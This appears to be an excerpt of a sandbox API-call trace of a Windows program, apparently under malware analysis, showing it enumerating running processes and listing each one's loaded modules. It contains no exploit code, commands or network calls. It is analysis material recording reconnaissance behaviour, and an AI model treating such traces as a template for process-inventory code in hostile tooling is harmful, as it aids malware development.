	[0105.697] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0105.698] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xd80) returned 0xffffffff
	[0105.700] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0105.701] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xe90) returned 0x840
	[0105.709] Module32FirstW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.710] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.711] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.711] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.712] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.713] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.714] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.717] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.717] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.718] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.719] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.720] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.721] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.722] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.723] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.723] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.724] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.725] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.726] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 0
	[0105.726] Module32FirstW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Uninstall Information\\develop-patent.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Uninstall Information\\develop-patent.exe", lpUsedDefaultChar=0x0) returned 58
	[0105.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 19
	[0105.743] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.744] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.745] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.746] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.747] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.747] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.748] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.749] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.750] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.751] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.752] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.752] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.753] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.754] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.755] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.756] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.757] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 1
	[0105.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.758] Module32NextW (hSnapshot=0x840, lpme=0x20af280) returned 0
	[0105.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 19
	[0105.758] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0105.759] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xea4) returned 0x804
	[0105.766] Module32FirstW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.767] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.768] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.769] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.770] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.770] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.771] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.772] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.772] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.773] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.774] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.775] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.775] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.776] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.794] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.795] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.795] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.796] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.797] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 0
	[0105.798] Module32FirstW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Common Files\\its.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Common Files\\its.exe", lpUsedDefaultChar=0x0) returned 44
	[0105.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 8
	[0105.799] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.799] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.800] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.801] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.802] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.803] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.803] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.804] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.805] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.806] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.807] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.808] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
